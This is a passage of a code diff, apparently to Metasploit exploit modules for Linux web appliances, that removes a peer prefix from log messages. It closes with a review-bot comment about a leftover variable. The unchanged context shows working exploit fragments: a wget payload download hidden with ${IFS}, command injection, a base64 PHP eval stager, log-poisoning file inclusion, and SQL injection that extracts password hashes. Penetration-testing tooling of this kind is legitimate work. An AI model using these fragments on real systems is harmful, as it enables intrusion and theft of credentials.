+++ b/modules/exploits/linux/http/multi_ncc_ping_exec.rb @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") @pl = generate_payload_exe @payload_url = '' @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}" - print_status("#{peer} - Downloading the payload to the target machine...") + print_status("Downloading the payload to the target machine...") res = exec_command(cmd) if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/ @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote def chmod_payload cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}" - print_status("#{peer} - chmod the payload...") + print_status("chmod the payload...") res = exec_command(cmd, 1) unless res @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote def exec_payload cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") res = exec_command(cmd, 1) unless res diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index bd9cf31035..f2b62feae3 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb 
@@ -143,9 +143,9 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else fail_with(Failure::NoAccess, "#{peer} - Login failed, review USERNAME and PASSWORD options") end @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_native - print_status("#{peer} - Uploading executable Payload file") + print_status("Uploading executable Payload file") elf = payload.encoded_exe elf_location = "/tmp" elf_filename = "#{rand_text_alpha_lower(8)}.elf" @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") jsp = jsp_execute_command("#{elf_location}/#{elf_filename}") jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m" jsp_filename = "#{rand_text_alpha_lower(8)}.jsp" @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "m", jsp_filename), diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb index 9fce52a1a5..2927c2bb20 100644 --- a/modules/exploits/linux/http/netgear_readynas_exec.rb +++ b/modules/exploits/linux/http/netgear_readynas_exec.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit my_payload = "#{rand_text_numeric(1)});use MIME::Base64;system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\")" - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_payload(my_payload) end 
diff --git a/modules/exploits/linux/http/nginx_chunked_size.rb b/modules/exploits/linux/http/nginx_chunked_size.rb index be5ae4c9c3..14e5d58793 100644 --- a/modules/exploits/linux/http/nginx_chunked_size.rb +++ b/modules/exploits/linux/http/nginx_chunked_size.rb @@ -85,7 +85,7 @@ class Metasploit4 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end @@ -213,16 +213,16 @@ class Metasploit4 < Msf::Exploit::Remote else if not datastore['CANARY'] == 0xffffffff - print_status("#{peer} - Using 0x%08x as stack canary" % datastore['CANARY']) + print_status("Using 0x%08x as stack canary" % datastore['CANARY']) canary = datastore['CANARY'] else - print_status("#{peer} - Searching for stack canary") + print_status("Searching for stack canary") canary = find_canary if canary.nil? || canary == 0x00000000 fail_with(Failure::Unknown, "#{peer} - Unable to find stack canary") else - print_good("#{peer} - Canary found: 0x%08x\n" % canary) + print_good("Canary found: 0x%08x\n" % canary) end end @@ -246,11 +246,11 @@ class Metasploit4 < Msf::Exploit::Remote # First byte of the canary is already known canary = "\x00" - print_status("#{peer} - Assuming byte 0 0x%02x" % 0x00) + print_status("Assuming byte 0 0x%02x" % 0x00) # We are going to bruteforce the next 3 bytes one at a time 3.times do |c| - print_status("#{peer} - Bruteforcing byte #{c + 1}") + print_status("Bruteforcing byte #{c + 1}") 0.upto(255) do |i| data = random_chunk_size(1024) @@ -259,7 +259,7 @@ class Metasploit4 < Msf::Exploit::Remote data << i.chr unless send_request_fixed(data).nil? - print_good("#{peer} - Byte #{c + 1} found: 0x%02x" % i) + print_good("Byte #{c + 1} found: 0x%02x" % i) canary << i.chr break end 
diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index 782cd0a2e1..d3bc972546 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from login page - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ 'uri' => '/' @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = Rex::Text.uri_encode("&#{payload.raw}&") # send payload - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ 'uri' => '/admin/system.html', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /System : Network Setup<\/title>/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/ fail_with(Failure::NoAccess, 'Authentication failed') else diff --git a/modules/exploits/linux/http/pandora_fms_exec.rb b/modules/exploits/linux/http/pandora_fms_exec.rb index 110c774531..8d08d715ac 100644 --- a/modules/exploits/linux/http/pandora_fms_exec.rb +++ b/modules/exploits/linux/http/pandora_fms_exec.rb 
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) - print_status("#{peer} - Trying to escalate privileges to root") + print_status("Trying to escalate privileges to root") [ # ignore SIGHUP so the server doesn't kill our root shell "trap '' HUP", @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect Pandora FMS Remote Gateway") + print_status("Trying to detect Pandora FMS Remote Gateway") res = send_request_cgi({ 'method' => 'GET', @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway") - print_good("#{peer} - Pandora FMS Remote Gateway Detected!") + print_good("Pandora FMS Remote Gateway Detected!") return Exploit::CheckCode::Detected end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload") + print_status("Sending payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "/anyterm-module"), diff --git a/modules/exploits/linux/http/pandora_fms_sqli.rb b/modules/exploits/linux/http/pandora_fms_sqli.rb index 070c50dd90..9c17429b93 100644 --- a/modules/exploits/linux/http/pandora_fms_sqli.rb +++ b/modules/exploits/linux/http/pandora_fms_sqli.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") version = nil res = send_request_cgi({ @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end unless version.nil? - vprint_status("#{peer} - Pandora FMS #{version} found") + vprint_status("Pandora FMS #{version} found") if Gem::Version.new(version) <= Gem::Version.new('5.0SP2') return Exploit::CheckCode::Appears end 
@@ -120,13 +120,13 @@ class Metasploit3 < Msf::Exploit::Remote password = inject_sql(sqli, clue) if password && password.length != 0 - print_status("#{peer} - Extracted auto login password (#{password})") + print_status("Extracted auto login password (#{password})") else - print_error("#{peer} - No auto login password has been defined!") + print_error("No auto login password has been defined!") return false end - print_status("#{peer} - Attempting to authenticate using (admin:#{password})") + print_status("Attempting to authenticate using (admin:#{password})") # Attempt to login using login hash password res = send_request_cgi({ 'method' => 'POST', @@ -146,17 +146,17 @@ class Metasploit3 < Msf::Exploit::Remote def auth_succeeded?(res) if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS') - print_status("#{peer} - Successfully authenticated!") - print_status("#{peer} - Attempting to retrieve session cookie") + print_status("Successfully authenticated!") + print_status("Attempting to retrieve session cookie") @cookie = res.get_cookies if @cookie.include?('PHPSESSID') - print_status("#{peer} - Successfully retrieved session cookie: #{@cookie}") + print_status("Successfully retrieved session cookie: #{@cookie}") return true else - print_error("#{peer} - Error retrieving cookie!") + print_error("Error retrieving cookie!") end else - print_error("#{peer} - Authentication failed!") + print_error("Authentication failed!") end false @@ -177,9 +177,9 @@ class Metasploit3 < Msf::Exploit::Remote password = inject_sql(sqli, clue) if password && password.length != 0 - print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]") + print_good("Extracted admin password hash, unsalted md5 - [ #{password} ]") else - print_error("#{peer} - Unable to extract password hash!") + print_error("Unable to extract password hash!") return false end end 
@@ -204,7 +204,7 @@ class Metasploit3 < Msf::Exploit::Remote if match result = match[1] else - print_error("#{peer} - SQL injection failed") + print_error("SQL injection failed") end end result @@ -229,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="hash" type="hidden" value=")(.*?)(?=" \/>)/ hash = $1 else - print_error("#{peer} - Could not extract hash from response!") + print_error("Could not extract hash from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="hash2" type="hidden" value=")(.*?)(?=" \/>)/ hash2 = $1 else - print_error("#{peer} - Could not extract hash2 from response!") + print_error("Could not extract hash2 from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -245,11 +245,11 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="real_directory" type="hidden" value=")(.*?)(" \/>)/ real_directory = $1 else - print_error("#{peer} - Could not extract real_directory from response!") + print_error("Could not extract real_directory from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end else - print_error("#{peer} - Could not identify upload form!") + print_error("Could not identify upload form!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -266,7 +266,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part("#{hash2}", nil, nil, 'form-data; name="hash2"') post_data.add_part('1', nil, nil, 'form-data; name="upload_file_or_zip"') - print_status("#{peer} - Attempting to upload payload #{@payload_name}...") + print_status("Attempting to upload payload #{@payload_name}...") res = send_request_cgi({ 'method' => 'POST', 'cookie' => @cookie, 
@@ -281,7 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.include?("Upload correct") register_file_for_cleanup(@payload_name) - print_status("#{peer} - Successfully uploaded payload") + print_status("Successfully uploaded payload") else fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -290,24 +290,24 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # First try to authenticate using default or user-supplied credentials - print_status("#{peer} - Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})") + print_status("Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})") auth = authenticate unless auth - print_status("#{peer} - Attempting to extract auto login hash via SQLi") + print_status("Attempting to extract auto login hash via SQLi") auth = login_hash end unless auth - print_status("#{peer} - Attempting to extract admin password hash with SQLi") + print_status("Attempting to extract admin password hash with SQLi") extract fail_with(Failure::NoAccess, "#{peer} - Unable to perform remote code execution!") end - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") upload - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'images', @payload_name), diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb index 8806f177b8..3cf0aafc86 100644 --- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb 
@@ -82,13 +82,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb index 95759912b2..56c7f7425a 100644 --- a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb +++ b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb @@ -109,7 +109,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 1 - Establish a session with the target which will give us a PHP object we can # work with. begin - print_status("#{peer} - Establishing session with target ...") + print_status("Establishing session with target ...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri), 'method' => 'GET', @@ -129,13 +129,13 @@ class Metasploit4 < Msf::Exploit::Remote # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly # then update it so that it's an admin session before re-encrypting - print_status("#{peer} - Upgrading session to administrator ...") + print_status("Upgrading session to administrator ...") php_object = decode_cookie(cookie_value) - vprint_status("#{peer} - PHP Object: #{php_object}") + vprint_status("PHP Object: #{php_object}") admin_php_object = set_string(php_object, 'is_admin', 'yes') admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT']) - vprint_status("#{peer} - Admin PHP object: #{admin_php_object}") + vprint_status("Admin PHP object: #{admin_php_object}") admin_cookie_value = encode_cookie(admin_php_object) 
@@ -146,7 +146,7 @@ class Metasploit4 < Msf::Exploit::Remote config_time = ::Time.now.to_i begin - print_status("#{peer} - Extracting existing host configuration ...") + print_status("Extracting existing host configuration ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'), 'method' => 'GET', @@ -173,8 +173,8 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") end - print_good("#{peer} - Host configuration extracted.") - vprint_status("#{peer} - Host configuration: #{host_config}") + print_good("Host configuration extracted.") + vprint_status("Host configuration: #{host_config}") # Step 4 - replace the host device description with a custom payload that can # be used for LFI. We have to keep the payload small because of size limitations @@ -191,7 +191,7 @@ class Metasploit4 < Msf::Exploit::Remote installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));" stager = Rex::Text.encode_base64(installer) stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>") - vprint_status("#{peer} - Stager: #{stager}") + vprint_status("Stager: #{stager}") # Butcher the XML directly rather than attempting to use REXML. The target XML # parser is way to simple/flaky to deal with the proper stuff that REXML @@ -203,7 +203,7 @@ class Metasploit4 < Msf::Exploit::Remote vprint_status(xml_payload) # Step 5 - set the host description to the stager so that it is written to disk - print_status("#{peer} - Uploading stager ...") + print_status("Uploading stager ...") begin res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 
@@ -227,10 +227,10 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") end - print_good("#{peer} - Stager uploaded.") + print_good("Stager uploaded.") # Step 6 - Invoke the stage, passing in a self-deleting php script body. - print_status("#{peer} - Executing stager ...") + print_status("Executing stager ...") payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00") payload_cookie_value = encode_cookie(payload_php_object) self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>" @@ -250,20 +250,20 @@ class Metasploit4 < Msf::Exploit::Remote ) if res && res.code == 200 - print_good("#{peer} - Stager execution succeeded, payload ready for execution.") + print_good("Stager execution succeeded, payload ready for execution.") else - print_error("#{peer} - Stager execution failed (invalid result).") + print_error("Stager execution failed (invalid result).") errored = true end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - print_error("#{peer} - Stager execution failed (unable to establish connection).") + print_error("Stager execution failed (unable to establish connection).") errored = true end # Step 7 - try to restore the previous configuration, allowing exceptions # to bubble up given that we're at the end. This step is important because # we don't want to leave a trail of junk on disk at the end. - print_status("#{peer} - Restoring host config ...") + print_status("Restoring host config ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', 
@@ -281,7 +281,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 8 - invoke the installed payload, but only if all went to plan. unless errored - print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...") + print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, payload_file), 'method' => 'GET', @@ -325,7 +325,7 @@ class Metasploit4 < Msf::Exploit::Remote cookie_value = xor(block, datastore['XORKEY']) cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value)) - vprint_status("#{peer} - Cookie value: #{cookie_value}") + vprint_status("Cookie value: #{cookie_value}") cookie_value end diff --git a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb index 38434f957a..234cf47a2d 100644 --- a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb +++ b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit buffer = self.send(target[:callback]) - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") send_close_window_request(buffer, payload.encoded) end diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb index f3e0af32f5..a98731bc11 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = "subnet=" post_data << "\";" + payload.raw + ";#" - print_status("#{peer} - Sending Command injection") + print_status("Sending Command injection") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'spywall/ipchange.php'), 
@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote # If the server doesn't return the default redirection, probably # something is wrong if not res or res.code != 302 or res.headers['Location'] !~ /SW\/admin_config.php/ - print_error("#{peer} - Probably command not executed, aborting!") + print_error("Probably command not executed, aborting!") return end diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb index 5eef56db31..6a0538c640 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(after_filename, "application/octet-stream", nil, "form-data; name=\"after_filename\"") post_data.add_part("<?php #{payload.encoded} ?>", "image/gif", nil, "form-data; name=\"new_image\"; filename=\"#{payload_name}\"") - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "spywall/blocked_file.php"), @@ -104,11 +104,11 @@ class Metasploit3 < Msf::Exploit::Remote # of the default file, we assume we uploaded the malicious # file successfully if not res or res.code != 200 or res.body !~ /temp.php/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', 
@@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb index ca0376af14..b2f4258902 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote php = %Q|<?php #{payload.encoded} ?>| # Inject PHP to log - print_status("#{peer} - Injecting PHP to log...") + print_status("Injecting PHP to log...") res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{php}" @@ -92,13 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote # Use the directory traversal to load the PHP code # access_log takes a long time to retrieve - print_status("#{peer} - Loading PHP code..") + print_status("Loading PHP code..") send_request_raw({ 'method' => 'GET', 'uri' => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log' }) - print_status("#{peer} - Waiting for a session, may take some time...") + print_status("Waiting for a session, may take some time...") select(nil, nil, nil, 1) diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb index 9cfd6f0a9a..6a331e2b35 100644 --- a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb +++ b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb 
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -80,11 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase } model = "DS#{model}" unless model =~ /^[A-Z]/ else - vprint_status("#{peer} - Detection failed") + vprint_status("Detection failed") return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Model #{model} with version #{version}-#{build} detected") + vprint_status("Model #{model} with version #{version}-#{build} detected") case version when '4.0' @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1') # send request to append shell commands - print_status("#{peer} - Injecting the payload...") + print_status("Injecting the payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('webman', 'imageSelector.cgi'), @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote end # send request to invoke the injected shell commands - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('redirect.cgi'), @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") end - print_good("#{peer} - Command successfully executed") + print_good("Command successfully executed") print_line(res.body) end end diff --git a/modules/exploits/linux/http/vap2500_tools_command_exec.rb b/modules/exploits/linux/http/vap2500_tools_command_exec.rb index e64f6b7146..0d9432b712 100644 --- a/modules/exploits/linux/http/vap2500_tools_command_exec.rb +++ b/modules/exploits/linux/http/vap2500_tools_command_exec.rb 
@@ -71,13 +71,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") if datastore['PAYLOAD'] == 'cmd/unix/generic' exploit_cmd @@ -102,9 +102,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ - print_good("#{peer} - Command sent successfully") + print_good("Command sent successfully") if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m - print_status("#{peer} - Command output: #{$1}") + print_status("Command output: #{$1}") end else fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed") diff --git a/modules/exploits/linux/http/wanem_exec.rb b/modules/exploits/linux/http/wanem_exec.rb index 2ee3d5bb07..3411f73fc1 100644 --- a/modules/exploits/linux/http/wanem_exec.rb +++ b/modules/exploits/linux/http/wanem_exec.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "pc=127.0.0.1; " data << Rex::Text.uri_encode("echo #{fingerprint}") data << "%26" - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end 
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "pc=127.0.0.1; " data << Rex::Text.uri_encode(payload.raw) data << "%26" - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ 'uri' => '/WANem/result.php', @@ -100,12 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") end if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else - print_error("#{peer} - Sending payload failed") + print_error("Sending payload failed") end end diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index 0aa9a24a84..af414339ba 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = target_uri.path - print_status("#{peer} - Housing php payload...") + print_status("Housing php payload...") # Allow commands to be passed as a header. # We use 'data' instead of 'vars_post to avoid the MSF API escapeing our stuff. @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => post_data }) - print_status("#{peer} - Loading our payload...") + print_status("Loading our payload...") # Execute our payload send_request_raw({ diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 27ad401c98..aaa3c51f36 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb 
@@ -82,8 +82,8 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{client.peerhost}:#{client.peerport}" if client.type != "meterpreter" - print_error("#{peer} - NOTE: you must use a meterpreter payload in order to automatically cleanup.") - print_error("#{peer} - The currencies.php won't be restored automatically.") + print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.") + print_error("The currencies.php won't be restored automatically.") return end @@ -102,19 +102,19 @@ class Metasploit3 < Msf::Exploit::Remote currencies_php = currencies_php.gsub(/^ {6}/, '') pwd = client.fs.dir.pwd - print_status("#{peer} - Searching currencies.php file from #{pwd}") + print_status("Searching currencies.php file from #{pwd}") res = client.fs.file.search(nil, "currencies.php", true, -1) res.each do |hit| filename = "#{hit['path']}/#{hit['name']}" - print_warning("#{peer} - Restoring #{filename}") + print_warning("Restoring #{filename}") client.fs.file.rm(filename) fd = client.fs.file.new(filename, "wb") fd.write(currencies_php) fd.close end - print_status("#{peer} - Cleanup finished") + print_status("Cleanup finished") end @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote stub = "\0'));#{payload.encoded}?>" - print_status("#{peer} - Injecting the PHP payload") + print_status("Injecting the PHP payload") response = send_request_cgi({ 'uri' => normalize_uri(uri, "converter.php"), @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("#{peer} - Executing the PHP payload") + print_status("Executing the PHP payload") timeout = 0.01 response = send_request_cgi({ diff --git a/modules/exploits/linux/http/zabbix_sqli.rb b/modules/exploits/linux/http/zabbix_sqli.rb index 73ae05f5fa..782c427555 100644 --- a/modules/exploits/linux/http/zabbix_sqli.rb +++ b/modules/exploits/linux/http/zabbix_sqli.rb 
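Review bot: The local `peer = "#{client.peerhost}:#{client.peerport}"` at the top of the `@@ -82,8 +82,8 @@` hunk is left behind although every visible use of it is removed here and in the `@@ -102,19 +102,19 @@` hunk. The enclosing method starts outside the hunk, so a use further up cannot be excluded. If there is none, delete the assignment. These messages used to name the session's peer; if they should keep doing so, interpolate it explicitly rather than rely on whatever prefix the print helpers add, which is not visible here. The same dead assignment remains in exim_gethostbyname_bof.rb (`@@ -97,7 +97,7 @@`), where `peer = "#{rhost}:#{rport}"` in the `rescue` branch only fed the prefix that was removed.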
